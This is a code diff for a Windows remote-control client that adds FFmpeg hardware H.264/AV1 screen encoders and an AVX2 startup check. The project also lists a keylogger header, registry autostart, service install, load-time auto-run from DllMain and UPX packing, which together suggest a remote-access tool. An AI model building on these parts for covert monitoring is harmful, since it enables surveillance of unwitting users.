$rootDir = $PSScriptRoot
$slnFile = Join-Path $rootDir "YAMA.sln" $slnFile = Join-Path $rootDir "YAMA.sln"
$upxPath = Join-Path $rootDir "server\2015Remote\res\3rd\upx.exe"
# Publish mode overrides # Publish mode overrides
if ($Publish) { if ($Publish) {

243
client/CFFmpegAV1Encoder.cpp Normal file
View File

@@ -0,0 +1,243 @@
#include "CFFmpegAV1Encoder.h"
#include "common/config.h"
#include "common/logger.h"
// 合规守护DISABLE_FFMPEG_FOR_TEST=1 时整个实现移出编译单元FFmpeg lib 已在
// CFFmpegH264Encoder.cpp 用同条件链接,此处不重复 #pragma comment
#if defined(_WIN64) && !DISABLE_FFMPEG_FOR_TEST
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavutil/opt.h>
#include <libavutil/imgutils.h>
#include <libyuv/libyuv.h>
}
#include <string.h>
// FFmpeg / 系统库已经由 CFFmpegH264Encoder.cpp 的 #pragma comment(lib) 引入。
// 这里不再重复声明(重复 #pragma comment 在同一 link 单元不冲突但冗余)。
// av_opt_set 包装:拼错的参数值会被 FFmpeg 静默忽略,包一层日志便于发现。
// 实现与 CFFmpegH264Encoder 内的 helper 相同;放成 static 文件内可见即可。
static void setOpt(void* obj, const char* name, const char* val, const char* backend) {
int rc = av_opt_set(obj, name, val, 0);
if (rc < 0) {
char errbuf[128] = {0};
av_strerror(rc, errbuf, sizeof(errbuf));
Mprintf("[WARN] av_opt_set('%s'='%s') on %s failed (%d): %s\n",
name, val, backend, rc, errbuf);
}
}
static void setOptInt(void* obj, const char* name, int64_t val, const char* backend) {
int rc = av_opt_set_int(obj, name, val, 0);
if (rc < 0) {
char errbuf[128] = {0};
av_strerror(rc, errbuf, sizeof(errbuf));
Mprintf("[WARN] av_opt_set_int('%s'=%lld) on %s failed (%d): %s\n",
name, (long long)val, backend, rc, errbuf);
}
}
// AV1 硬编后端探测顺序,没有 av1_mf 兜底FFmpeg 7.1 不支持)。
// 全失败时 EncoderFactory 自动回退到 H.264 路径,行为对称。
static const char* kAV1Backends[] = {
"av1_nvenc", // NVIDIA RTX 40 / 50 系Ada Lovelace+
"av1_amf", // AMD RX 7000+RDNA 3+
"av1_qsv", // Intel Arc 独显 / 部分 11 代+ 核显
};
CFFmpegAV1Encoder::CFFmpegAV1Encoder() = default;
CFFmpegAV1Encoder::~CFFmpegAV1Encoder() {
close();
}
void CFFmpegAV1Encoder::cleanupCodec() {
if (m_packet) { av_packet_free(&m_packet); m_packet = nullptr; }
if (m_frame) { av_frame_free(&m_frame); m_frame = nullptr; }
if (m_ctx) { avcodec_free_context(&m_ctx); m_ctx = nullptr; }
}
void CFFmpegAV1Encoder::close() {
cleanupCodec();
m_backend.clear();
m_pts = 0;
m_forceIDR = false;
}
bool CFFmpegAV1Encoder::open(const EncoderParams& params) {
close();
for (const char* name : kAV1Backends) {
if (tryOpenBackend(name, params)) {
m_backend = name;
return true;
}
cleanupCodec();
}
return false;
}
bool CFFmpegAV1Encoder::tryOpenBackend(const char* name, const EncoderParams& p) {
const AVCodec* codec = avcodec_find_encoder_by_name(name);
if (!codec) {
// AV1 硬编没注册 = 老 ffmpeg lib 不含 AV1 encodercompress\ffmpeg 没启用 av1
Mprintf("=> FFmpeg: AV1 encoder '%s' NOT in linked lib\n", name);
return false;
}
m_ctx = avcodec_alloc_context3(codec);
if (!m_ctx) {
Mprintf("=> FFmpeg: avcodec_alloc_context3('%s') failed\n", name);
return false;
}
m_ctx->width = p.width & ~1;
m_ctx->height = p.height & ~1;
m_ctx->time_base = AVRational{1, p.fps};
m_ctx->framerate = AVRational{p.fps, 1};
m_ctx->pix_fmt = AV_PIX_FMT_NV12;
m_ctx->gop_size = p.fps * (p.gop_seconds > 0 ? p.gop_seconds : 15);
m_ctx->max_b_frames = 0;
m_ctx->bit_rate = (int64_t)p.bitrate_kbps * 1000;
m_ctx->rc_max_rate = (int64_t)p.bitrate_kbps * 1500;
m_ctx->rc_buffer_size = (int)(p.bitrate_kbps * 1000);
// RC 策略与 H.264 路径对齐peak-constrained VBR远控静态画面省带宽。
if (strcmp(name, "av1_nvenc") == 0) {
// av1_nvenc preset p1~p7远控 p5 兼顾质量与速度。
// tile-columns=1 把帧切两列,解码端并行更友好(浏览器 AV1 解码常用 SIMD/多线程)
setOpt(m_ctx->priv_data, "preset", "p5", name);
setOpt(m_ctx->priv_data, "tune", "ll", name);
setOpt(m_ctx->priv_data, "rc", "vbr", name);
setOpt(m_ctx->priv_data, "zerolatency", "1", name);
setOptInt(m_ctx->priv_data, "tile-columns", 1, name);
} else if (strcmp(name, "av1_amf") == 0) {
// av1_amf 选项命名与 h264_amf 大体一致rc 同样支持 vbr_peak
// (见 ffmpeg -h encoder=av1_amf)。静态画面省码率四件套同 H.264 路径。
setOpt(m_ctx->priv_data, "usage", "lowlatency", name);
setOpt(m_ctx->priv_data, "quality", "quality", name);
setOpt(m_ctx->priv_data, "rc", "vbr_peak", name);
setOptInt(m_ctx->priv_data, "vbaq", 1, name);
setOptInt(m_ctx->priv_data, "preanalysis", 1, name);
setOptInt(m_ctx->priv_data, "filler_data", 0, name);
setOptInt(m_ctx->priv_data, "enforce_hrd", 0, name);
} else if (strcmp(name, "av1_qsv") == 0) {
// av1_qsvbit_rate < max_rate 时自动 VBR
setOpt(m_ctx->priv_data, "preset", "slow", name);
setOptInt(m_ctx->priv_data, "async_depth", 1, name);
setOptInt(m_ctx->priv_data, "low_power", 0, name);
}
int ret = avcodec_open2(m_ctx, codec, nullptr);
if (ret < 0) {
// 找到了但开不起来:无对应 GPU / 驱动太旧 / 跨适配器
char errbuf[128] = {0};
av_strerror(ret, errbuf, sizeof(errbuf));
Mprintf("=> FFmpeg: avcodec_open2('%s') failed (%d): %s\n", name, ret, errbuf);
return false;
}
m_frame = av_frame_alloc();
if (!m_frame) return false;
m_frame->format = AV_PIX_FMT_NV12;
m_frame->width = m_ctx->width;
m_frame->height = m_ctx->height;
if (av_frame_get_buffer(m_frame, 32) < 0) {
Mprintf("=> FFmpeg: av_frame_get_buffer failed\n");
return false;
}
m_packet = av_packet_alloc();
return m_packet != nullptr;
}
void CFFmpegAV1Encoder::setBitrate(int kbps) {
if (!m_ctx) return;
m_ctx->bit_rate = (int64_t)kbps * 1000;
m_ctx->rc_max_rate = (int64_t)kbps * 1500;
m_ctx->rc_buffer_size = (int)(kbps * 1000);
// 同 H.264 路径:多数硬编不支持运行时改 bit_rate 让 ctx 立刻生效;
// 这里仅更新数值,下次 open 时生效。
}
int CFFmpegAV1Encoder::convertRGB24ToNV12(uint8_t* rgb, uint32_t stride,
uint32_t width, uint32_t height,
int direction)
{
int signed_height = direction * (int)height;
int w = (int)width;
int h = (int)height;
int y_size = w * h;
int uv_size = (w / 2) * (h / 2);
m_i420Scratch.resize(y_size + 2 * uv_size);
uint8_t* y = m_i420Scratch.data();
uint8_t* u = y + y_size;
uint8_t* v = u + uv_size;
if (libyuv::RGB24ToI420(rgb, stride, y, w, u, w / 2, v, w / 2, w, signed_height) != 0)
return -1;
if (libyuv::I420ToNV12(y, w, u, w / 2, v, w / 2,
m_frame->data[0], m_frame->linesize[0],
m_frame->data[1], m_frame->linesize[1],
w, h) != 0)
return -1;
return 0;
}
int CFFmpegAV1Encoder::encode(
uint8_t* rgb, uint8_t bpp, uint32_t stride,
uint32_t width, uint32_t height,
uint8_t** lppData, uint32_t* lpSize, int direction)
{
if (!m_ctx || !m_frame || !m_packet) return -1;
if (av_frame_make_writable(m_frame) < 0) return -1;
int w = (int)width;
int h = (int)height;
int signed_height = direction * h;
if (bpp == 32) {
if (libyuv::ARGBToNV12(
rgb, stride,
m_frame->data[0], m_frame->linesize[0],
m_frame->data[1], m_frame->linesize[1],
w, signed_height) != 0) {
return -1;
}
} else if (bpp == 24) {
if (convertRGB24ToNV12(rgb, stride, width, height, direction) != 0) {
return -1;
}
} else {
return -2;
}
m_frame->pts = m_pts++;
if (m_forceIDR) {
m_frame->pict_type = AV_PICTURE_TYPE_I;
m_forceIDR = false;
} else {
m_frame->pict_type = AV_PICTURE_TYPE_NONE;
}
int ret = avcodec_send_frame(m_ctx, m_frame);
if (ret < 0) return -3;
ret = avcodec_receive_packet(m_ctx, m_packet);
if (ret == AVERROR(EAGAIN)) {
*lppData = nullptr;
*lpSize = 0;
return 0;
}
if (ret < 0) return -4;
m_outputBuffer.assign(m_packet->data, m_packet->data + m_packet->size);
*lppData = m_outputBuffer.data();
*lpSize = (uint32_t)m_outputBuffer.size();
av_packet_unref(m_packet);
return 0;
}
#endif // _WIN64 && !DISABLE_FFMPEG_FOR_TEST

62
client/CFFmpegAV1Encoder.h Normal file
View File

@@ -0,0 +1,62 @@
#pragma once
#include "VideoEncoderBase.h"
#include "common/config.h"
#include <string>
#include <vector>
// 合规守护DISABLE_FFMPEG_FOR_TEST=1 时整类移出编译单元,避免 GPL 传染(与 c0a632a 对齐)
#if defined(_WIN64) && !DISABLE_FFMPEG_FOR_TEST
struct AVCodecContext;
struct AVFrame;
struct AVPacket;
// FFmpeg 硬编 AV1 实现。
// 后端探测顺序av1_nvenc (NVIDIA RTX 40+) → av1_amf (AMD RX 7000+) → av1_qsv
// (Intel Arc / 11 代+ 部分核显)。AV1 硬编硬件门槛比 H.264 高得多 —— 没合适
// 硬件时 open 全部失败,由 EncoderFactory 自动回退到 H.264 路径。
//
// 注意FFmpeg 7.1 没有 av1_mf 兜底,因此本类的探测列表比 H.264 短一项。
class CFFmpegAV1Encoder : public VideoEncoderBase
{
public:
CFFmpegAV1Encoder();
~CFFmpegAV1Encoder() override;
bool open(const EncoderParams& params) override;
void close() override;
int encode(
uint8_t* rgb,
uint8_t bpp,
uint32_t stride,
uint32_t width,
uint32_t height,
uint8_t** lppData,
uint32_t* lpSize,
int direction = 1
) override;
void forceIDR() override { m_forceIDR = true; }
void setBitrate(int kbps) override;
VideoCodec codec() const override { return VideoCodec::AV1; }
const char* backendName() const override { return m_backend.c_str(); }
private:
bool tryOpenBackend(const char* name, const EncoderParams& p);
void cleanupCodec();
int convertRGB24ToNV12(uint8_t* rgb, uint32_t stride,
uint32_t width, uint32_t height, int direction);
AVCodecContext* m_ctx = nullptr;
AVFrame* m_frame = nullptr;
AVPacket* m_packet = nullptr;
std::vector<uint8_t> m_outputBuffer;
std::vector<uint8_t> m_i420Scratch;
int64_t m_pts = 0;
bool m_forceIDR = false;
std::string m_backend;
};
#endif // _WIN64 && !DISABLE_FFMPEG_FOR_TEST

299
client/CFFmpegH264Encoder.cpp Normal file
View File

@@ -0,0 +1,299 @@
#include "CFFmpegH264Encoder.h"
#include "common/config.h"
#include "common/logger.h"
// 合规守护DISABLE_FFMPEG_FOR_TEST=1 时整个实现 + 所有 #pragma comment(lib,"ffmpeg/...")
// 都不进编译单元FFmpeg 静态库不会被链接进二进制
#if defined(_WIN64) && !DISABLE_FFMPEG_FOR_TEST
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavutil/opt.h>
#include <libavutil/imgutils.h>
#include <libyuv/libyuv.h>
}
#include <string.h>
#include <cstdlib>
// FFmpeg 静态库 + 必要的 Windows 系统库。x86 build 不引入,由 _WIN64 守护。
// FFmpeg 三个核心库是纯 CCRT 中性Debug/Release 共用一份。
#pragma comment(lib,"ffmpeg/libavcodec_x64.lib")
#pragma comment(lib,"ffmpeg/libavutil_x64.lib")
#pragma comment(lib,"ffmpeg/libswresample_x64.lib")
// dav1d (AV1 软解C 项目) —— 不分 Debug/Release。
// build 时启用了 --enable-libdav1dlibavcodec 内部 av1 decoder 引用了 dav1d 符号。
#pragma comment(lib,"ffmpeg/dav1d_x64.lib")
// libvpl (Intel QSV, C++ 项目) —— 强制 CRT 一致,必须按 _DEBUG 切。
// build 时启用了 --enable-libvpllibavcodec 内部 h264_qsv / av1_qsv encoder 引用 MFX 符号。
#ifdef _DEBUG
#pragma comment(lib,"ffmpeg/vpl_x64d.lib")
#else
#pragma comment(lib,"ffmpeg/vpl_x64.lib")
#endif
#pragma comment(lib, "mfplat.lib")
#pragma comment(lib, "mfuuid.lib")
#pragma comment(lib, "strmiids.lib")
#pragma comment(lib, "secur32.lib")
#pragma comment(lib, "bcrypt.lib")
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "ole32.lib")
// ws2_32 在 IOCPClient.h 已 link重复不冲突
#pragma comment(lib, "ws2_32.lib")
// av_opt_set wrappersFFmpeg 在选项名/值拼错时 silently 返回 AVERROR_OPTION_NOT_FOUND
// 不报错,导致 encoder 退回默认行为且没人察觉实际踩过AMF rc=vbr_peak_constrained
// 拼成全名FFmpeg 实际只接受 vbr_peak没设上去就退回 CBR
// 包一层 helper任何设置失败 Mprintf 警告。
static void setOpt(void* obj, const char* name, const char* val, const char* backend) {
int rc = av_opt_set(obj, name, val, 0);
if (rc < 0) {
char errbuf[128] = {0};
av_strerror(rc, errbuf, sizeof(errbuf));
Mprintf("[WARN] av_opt_set('%s'='%s') on %s failed (%d): %s\n",
name, val, backend, rc, errbuf);
}
}
static void setOptInt(void* obj, const char* name, int64_t val, const char* backend) {
int rc = av_opt_set_int(obj, name, val, 0);
if (rc < 0) {
char errbuf[128] = {0};
av_strerror(rc, errbuf, sizeof(errbuf));
Mprintf("[WARN] av_opt_set_int('%s'=%lld) on %s failed (%d): %s\n",
name, (long long)val, backend, rc, errbuf);
}
}
// 后端探测顺序NVIDIA > Intel > AMD > Windows MF 兜底。
// open() 主循环按顺序试,第一个 avcodec_open2 成功的就用。
// h264_mf 质量/稳定性一般,但是 Windows 系统级 hwaccel任何 GPU 都能尝试,作最后兜底。
static const char* kH264Backends[] = {
"h264_nvenc", // NVIDIA NVENC
"h264_qsv", // Intel Quick Sync Video
"h264_amf", // AMD AMF
"h264_mf", // Windows Media Foundation
};
CFFmpegH264Encoder::CFFmpegH264Encoder() = default;
CFFmpegH264Encoder::~CFFmpegH264Encoder() {
close();
}
void CFFmpegH264Encoder::cleanupCodec() {
if (m_packet) { av_packet_free(&m_packet); m_packet = nullptr; }
if (m_frame) { av_frame_free(&m_frame); m_frame = nullptr; }
if (m_ctx) { avcodec_free_context(&m_ctx); m_ctx = nullptr; }
}
void CFFmpegH264Encoder::close() {
cleanupCodec();
m_backend.clear();
m_pts = 0;
m_forceIDR = false;
}
bool CFFmpegH264Encoder::open(const EncoderParams& params) {
close();
for (const char* name : kH264Backends) {
if (tryOpenBackend(name, params)) {
m_backend = name;
return true;
}
cleanupCodec(); // 释放本次失败的 ctx准备下一次尝试
}
return false;
}
bool CFFmpegH264Encoder::tryOpenBackend(const char* name, const EncoderParams& p) {
const AVCodec* codec = avcodec_find_encoder_by_name(name);
if (!codec) {
// 失败 = lib 里没注册这个 encoder。几乎肯定是链到了老 ffmpeg lib。
Mprintf("=> FFmpeg: encoder '%s' NOT in linked lib (old ffmpeg?)\n", name);
return false;
}
m_ctx = avcodec_alloc_context3(codec);
if (!m_ctx) {
Mprintf("=> FFmpeg: avcodec_alloc_context3('%s') failed\n", name);
return false;
}
// 偶数对齐(与 x264 路径 i_width/i_height & 0xfffffffe 一致)
m_ctx->width = p.width & ~1;
m_ctx->height = p.height & ~1;
m_ctx->time_base = AVRational{1, p.fps};
m_ctx->framerate = AVRational{p.fps, 1};
m_ctx->pix_fmt = AV_PIX_FMT_NV12;
m_ctx->gop_size = p.fps * (p.gop_seconds > 0 ? p.gop_seconds : 4);
m_ctx->max_b_frames = 0;
m_ctx->bit_rate = (int64_t)p.bitrate_kbps * 1000;
m_ctx->rc_max_rate = (int64_t)p.bitrate_kbps * 1500;
m_ctx->rc_buffer_size = (int)(p.bitrate_kbps * 1000);
// RC 策略选择:远程办公 90% 时间是静态画面(文档/IDE/邮件CBR 会强行
// 把目标码率填满(静态用不上的部分浪费带宽)。所有硬编后端统一改用 VBR
// bit_rate 是平均目标、rc_max_rate (1.5x) 是峰值上限:静态时 encoder 自动
// 降码率省带宽,动态时回到目标 + 短暂上探到 1.5x 保证画质。
// 接近 x264 软编 CRF + VBV 的行为,但严格守住峰值不爆。
if (strcmp(name, "h264_nvenc") == 0) {
// NVENC preset: p1(最快/低质) ~ p7(最慢/高质),远控低延迟 p5 兼顾。
// tune=ll low-latencyrc=vbr 配 max_rate 实现峰值受限的 VBR。
setOpt(m_ctx->priv_data, "preset", "p5", name);
setOpt(m_ctx->priv_data, "tune", "ll", name);
setOpt(m_ctx->priv_data, "rc", "vbr", name);
setOpt(m_ctx->priv_data, "zerolatency", "1", name);
} else if (strcmp(name, "h264_qsv") == 0) {
// Intel Quick Sync Video。preset: veryfast/faster/fast/medium/slow/slower/veryslow
// QSV 当 bit_rate != rc_max_rate 时自动走 VBR所以这里只需调 preset。
// preset=slow 比 medium 慢但画质好async_depth=1 单帧立即出包。
// low_power=0 走 PAK 路径,部分集显不支持 low_power 模式。
setOpt(m_ctx->priv_data, "preset", "slow", name);
setOptInt(m_ctx->priv_data, "async_depth", 1, name);
setOptInt(m_ctx->priv_data, "low_power", 0, name);
} else if (strcmp(name, "h264_amf") == 0) {
// AMD AMF 远控低延迟配置:
// usage=ultralowlatency 比 lowlatency 更激进,关闭一切 lookahead
// quality=speed 选最快编码路径vs balanced/quality
// rc=cbr 提供最可预测的输出节拍,避免 RC 切换抖动。
// 静态画面省码率交给应用层 skip 检测ScreenCapture::GetNextScreenData
// 已经过 memcmp 把无变化帧直接拦在编码器之前),不再依赖 vbaq/preanalysis
// 这些会引入 30-100ms lookahead 的"省码率三件套"。
setOpt(m_ctx->priv_data, "usage", "ultralowlatency", name);
setOpt(m_ctx->priv_data, "quality", "speed", name);
setOpt(m_ctx->priv_data, "rc", "cbr", name);
setOptInt(m_ctx->priv_data, "filler_data", 0, name);
setOptInt(m_ctx->priv_data, "enforce_hrd", 0, name);
} else if (strcmp(name, "h264_mf") == 0) {
// Windows Media Foundation 兜底。rate_control 实际值ffmpeg -h encoder=h264_mf
// default / cbr / pc_vbr / u_vbr / quality / ld_vbr / g_vbr / gld_vbr
// 远控用 pc_vbr (peak-constrained VBR) 与其他后端语义对齐。
setOptInt(m_ctx->priv_data, "hw_encoding", 1, name);
setOpt(m_ctx->priv_data, "rate_control", "pc_vbr", name);
}
int ret = avcodec_open2(m_ctx, codec, nullptr);
if (ret < 0) {
// 失败 = encoder 找到了但开不起来。常见:无 NVIDIA GPU / 驱动太旧 /
// NVENC session 占满 / 笔记本独显未唤醒 / 参数组合驱动不接受
char errbuf[128] = {0};
av_strerror(ret, errbuf, sizeof(errbuf));
Mprintf("=> FFmpeg: avcodec_open2('%s') failed (%d): %s\n", name, ret, errbuf);
return false;
}
m_frame = av_frame_alloc();
if (!m_frame) return false;
m_frame->format = AV_PIX_FMT_NV12;
m_frame->width = m_ctx->width;
m_frame->height = m_ctx->height;
if (av_frame_get_buffer(m_frame, 32) < 0) {
Mprintf("=> FFmpeg: av_frame_get_buffer failed\n");
return false;
}
m_packet = av_packet_alloc();
return m_packet != nullptr;
}
void CFFmpegH264Encoder::setBitrate(int kbps) {
if (!m_ctx) return;
m_ctx->bit_rate = (int64_t)kbps * 1000;
m_ctx->rc_max_rate = (int64_t)kbps * 1500;
m_ctx->rc_buffer_size = (int)(kbps * 1000);
// 注意FFmpeg 多数硬编不支持运行时改 bit_rate 让 ctx 立即生效;
// 这里只更新数值,下次 open 时才生效。Step 1 不依赖动态调码率。
}
int CFFmpegH264Encoder::convertRGB24ToNV12(uint8_t* rgb, uint32_t stride,
uint32_t width, uint32_t height,
int direction)
{
int signed_height = direction * (int)height;
int w = (int)width;
int h = (int)height;
int y_size = w * h;
int uv_size = (w / 2) * (h / 2);
m_i420Scratch.resize(y_size + 2 * uv_size);
uint8_t* y = m_i420Scratch.data();
uint8_t* u = y + y_size;
uint8_t* v = u + uv_size;
if (libyuv::RGB24ToI420(
rgb, stride,
y, w,
u, w / 2,
v, w / 2,
w, signed_height) != 0) {
return -1;
}
if (libyuv::I420ToNV12(
y, w,
u, w / 2,
v, w / 2,
m_frame->data[0], m_frame->linesize[0],
m_frame->data[1], m_frame->linesize[1],
w, h) != 0) {
return -1;
}
return 0;
}
int CFFmpegH264Encoder::encode(
uint8_t* rgb, uint8_t bpp, uint32_t stride,
uint32_t width, uint32_t height,
uint8_t** lppData, uint32_t* lpSize, int direction)
{
if (!m_ctx || !m_frame || !m_packet) return -1;
if (av_frame_make_writable(m_frame) < 0) return -1;
int w = (int)width;
int h = (int)height;
int signed_height = direction * h;
if (bpp == 32) {
if (libyuv::ARGBToNV12(
rgb, stride,
m_frame->data[0], m_frame->linesize[0],
m_frame->data[1], m_frame->linesize[1],
w, signed_height) != 0) {
return -1;
}
} else if (bpp == 24) {
if (convertRGB24ToNV12(rgb, stride, width, height, direction) != 0) {
return -1;
}
} else {
return -2;
}
m_frame->pts = m_pts++;
if (m_forceIDR) {
m_frame->pict_type = AV_PICTURE_TYPE_I;
m_forceIDR = false;
} else {
m_frame->pict_type = AV_PICTURE_TYPE_NONE;
}
int ret = avcodec_send_frame(m_ctx, m_frame);
if (ret < 0) return -3;
ret = avcodec_receive_packet(m_ctx, m_packet);
if (ret == AVERROR(EAGAIN)) {
// 首帧延迟:本次没出包,调用方按 lpSize==0 跳过本帧
*lppData = nullptr;
*lpSize = 0;
return 0;
}
if (ret < 0) return -4;
m_outputBuffer.assign(m_packet->data, m_packet->data + m_packet->size);
*lppData = m_outputBuffer.data();
*lpSize = (uint32_t)m_outputBuffer.size();
av_packet_unref(m_packet);
return 0;
}
#endif // _WIN64 && !DISABLE_FFMPEG_FOR_TEST

62
client/CFFmpegH264Encoder.h Normal file
View File

@@ -0,0 +1,62 @@
#pragma once
#include "VideoEncoderBase.h"
#include "common/config.h"
#include <string>
#include <vector>
// 合规守护DISABLE_FFMPEG_FOR_TEST=1 时整类移出编译单元,避免 GPL 传染(与 c0a632a 对齐)
#if defined(_WIN64) && !DISABLE_FFMPEG_FOR_TEST
struct AVCodecContext;
struct AVFrame;
struct AVPacket;
// FFmpeg 硬编 H.264 实现。
// Step 1: 仅探测 h264_nvenc 单后端,足以验证 FFmpeg 静态库集成链路。
// Step 2: 扩展 h264_qsv / h264_amf / h264_mf。
//
// 输入像素BGRA (bpp=32) / RGB24 (bpp=24),与 CX264Encoder 完全一致;
// 内部转 NV12 喂给 FFmpeg encoder。
class CFFmpegH264Encoder : public VideoEncoderBase
{
public:
CFFmpegH264Encoder();
~CFFmpegH264Encoder() override;
bool open(const EncoderParams& params) override;
void close() override;
int encode(
uint8_t* rgb,
uint8_t bpp,
uint32_t stride,
uint32_t width,
uint32_t height,
uint8_t** lppData,
uint32_t* lpSize,
int direction = 1
) override;
void forceIDR() override { m_forceIDR = true; }
void setBitrate(int kbps) override;
VideoCodec codec() const override { return VideoCodec::H264; }
const char* backendName() const override { return m_backend.c_str(); }
private:
bool tryOpenBackend(const char* name, const EncoderParams& p);
void cleanupCodec();
int convertRGB24ToNV12(uint8_t* rgb, uint32_t stride,
uint32_t width, uint32_t height, int direction);
AVCodecContext* m_ctx = nullptr;
AVFrame* m_frame = nullptr;
AVPacket* m_packet = nullptr;
std::vector<uint8_t> m_outputBuffer; // encode 返回给调用方的缓冲(持有到下一次 encode
std::vector<uint8_t> m_i420Scratch; // RGB24 路径的中间缓冲
int64_t m_pts = 0;
bool m_forceIDR = false;
std::string m_backend; // 实际选中的后端名("h264_nvenc" / ...
};
#endif // _WIN64 && !DISABLE_FFMPEG_FOR_TEST

26
client/ClientDll.cpp
View File

@@ -6,11 +6,22 @@
#include <common/iniFile.h> #include <common/iniFile.h>
#include <common/LANChecker.h> #include <common/LANChecker.h>
#include <common/VerifyV2.h> #include <common/VerifyV2.h>
#include <intrin.h> // for __cpuid, __cpuidex
extern "C" { extern "C" {
#include "reg_startup.h" #include "reg_startup.h"
#include "ServiceWrapper.h" #include "ServiceWrapper.h"
} }
// Check if CPU supports AVX2 instruction set
static BOOL IsAVX2Supported()
{
int cpuInfo[4] = { 0, 0, 0, 0 };
__cpuid(cpuInfo, 0);
if (cpuInfo[0] < 7) return FALSE;
__cpuidex(cpuInfo, 7, 0);
return (cpuInfo[1] & (1 << 5)) != 0; // EBX bit 5 = AVX2
}
// 自动启动注册表中的值 // 自动启动注册表中的值
#define REG_NAME GetExeHashStr().c_str() #define REG_NAME GetExeHashStr().c_str()
@@ -195,6 +206,14 @@ BOOL CALLBACK callback(DWORD CtrlType)
int main(int argc, const char *argv[]) int main(int argc, const char *argv[])
{ {
// Check AVX2 support at startup
if (!IsAVX2Supported()) {
MessageBoxA(NULL,
"此程序需要支持 AVX2 指令集的 CPU2013年后的处理器。您的 CPU 不支持 AVX2程序无法运行。",
"CPU 不兼容", MB_ICONERROR);
return -1;
}
Mprintf("启动运行: %s %s. Arg Count: %d\n", argv[0], argc>1 ? argv[1] : "", argc); Mprintf("启动运行: %s %s. Arg Count: %d\n", argv[0], argc>1 ? argv[1] : "", argc);
InitWindowsService(NewService( InitWindowsService(NewService(
g_SETTINGS.installName[0] ? g_SETTINGS.installName : "RemoteControlService", g_SETTINGS.installName[0] ? g_SETTINGS.installName : "RemoteControlService",
@@ -312,6 +331,13 @@ BOOL APIENTRY DllMain( HINSTANCE hInstance,
{ {
switch (ul_reason_for_call) { switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH: { case DLL_PROCESS_ATTACH: {
// Check AVX2 support before starting
if (!IsAVX2Supported()) {
MessageBoxA(NULL,
"此程序需要支持 AVX2 指令集的 CPU2013年后的处理器。您的 CPU 不支持 AVX2程序无法运行。",
"CPU 不兼容", MB_ICONERROR);
return FALSE;
}
g_MyApp.g_hInstance = (HINSTANCE)hInstance; g_MyApp.g_hInstance = (HINSTANCE)hInstance;
CloseHandle(__CreateThread(NULL, 0, AutoRun, hInstance, 0, NULL)); CloseHandle(__CreateThread(NULL, 0, AutoRun, hInstance, 0, NULL));
break; break;

13
client/ClientDll_vs2015.vcxproj
View File

@@ -124,7 +124,7 @@
<AdditionalDependencies>zlib\zlib_x64.lib;%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>zlib\zlib_x64.lib;%(AdditionalDependencies)</AdditionalDependencies>
<IgnoreSpecificDefaultLibraries>libcmt.lib</IgnoreSpecificDefaultLibraries> <IgnoreSpecificDefaultLibraries>libcmt.lib</IgnoreSpecificDefaultLibraries>
<AdditionalOptions>/ignore:4099 %(AdditionalOptions)</AdditionalOptions> <AdditionalOptions>/ignore:4099 %(AdditionalOptions)</AdditionalOptions>
<AdditionalLibraryDirectories>$(SolutionDir)..\SimplePlugins\bin</AdditionalLibraryDirectories> <AdditionalLibraryDirectories>$(SolutionDir)..\SimplePlugins\bin;$(SolutionDir)..\ffmpeg-7.1\install-win64\lib</AdditionalLibraryDirectories>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
@@ -167,7 +167,7 @@
<OptimizeReferences>true</OptimizeReferences> <OptimizeReferences>true</OptimizeReferences>
<AdditionalDependencies>zlib\zlib_x64.lib;%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>zlib\zlib_x64.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalOptions> /SAFESEH:NO /ignore:4099 %(AdditionalOptions)</AdditionalOptions> <AdditionalOptions> /SAFESEH:NO /ignore:4099 %(AdditionalOptions)</AdditionalOptions>
<AdditionalLibraryDirectories>$(SolutionDir)..\SimplePlugins\bin</AdditionalLibraryDirectories> <AdditionalLibraryDirectories>$(SolutionDir)..\SimplePlugins\bin;$(SolutionDir)..\ffmpeg-7.1\install-win64\lib</AdditionalLibraryDirectories>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>
@@ -199,11 +199,15 @@
<ClCompile Include="RegisterOperation.cpp" /> <ClCompile Include="RegisterOperation.cpp" />
<ClCompile Include="SafeThread.cpp" /> <ClCompile Include="SafeThread.cpp" />
<ClCompile Include="ScreenManager.cpp" /> <ClCompile Include="ScreenManager.cpp" />
<ClCompile Include="ScreenPreview.cpp" />
<ClCompile Include="ScreenSpy.cpp" /> <ClCompile Include="ScreenSpy.cpp" />
<ClCompile Include="ServicesManager.cpp" /> <ClCompile Include="ServicesManager.cpp" />
<ClCompile Include="ShellManager.cpp" /> <ClCompile Include="ShellManager.cpp" />
<ClCompile Include="StdAfx.cpp" /> <ClCompile Include="StdAfx.cpp" />
<ClCompile Include="SystemManager.cpp" /> <ClCompile Include="SystemManager.cpp" />
<ClCompile Include="CFFmpegAV1Encoder.cpp" />
<ClCompile Include="CFFmpegH264Encoder.cpp" />
<ClCompile Include="EncoderFactory.cpp" />
<ClCompile Include="TalkManager.cpp" /> <ClCompile Include="TalkManager.cpp" />
<ClCompile Include="VideoManager.cpp" /> <ClCompile Include="VideoManager.cpp" />
<ClCompile Include="X264Encoder.cpp" /> <ClCompile Include="X264Encoder.cpp" />
@@ -227,6 +231,10 @@
<ClInclude Include="IOCPClient.h" /> <ClInclude Include="IOCPClient.h" />
<ClInclude Include="IOCPKCPClient.h" /> <ClInclude Include="IOCPKCPClient.h" />
<ClInclude Include="IOCPUDPClient.h" /> <ClInclude Include="IOCPUDPClient.h" />
<ClInclude Include="CFFmpegAV1Encoder.h" />
<ClInclude Include="CFFmpegH264Encoder.h" />
<ClInclude Include="EncoderFactory.h" />
<ClInclude Include="VideoEncoderBase.h" />
<ClInclude Include="KernelManager.h" /> <ClInclude Include="KernelManager.h" />
<ClInclude Include="KeyboardManager.h" /> <ClInclude Include="KeyboardManager.h" />
<ClInclude Include="keylogger.h" /> <ClInclude Include="keylogger.h" />
@@ -241,6 +249,7 @@
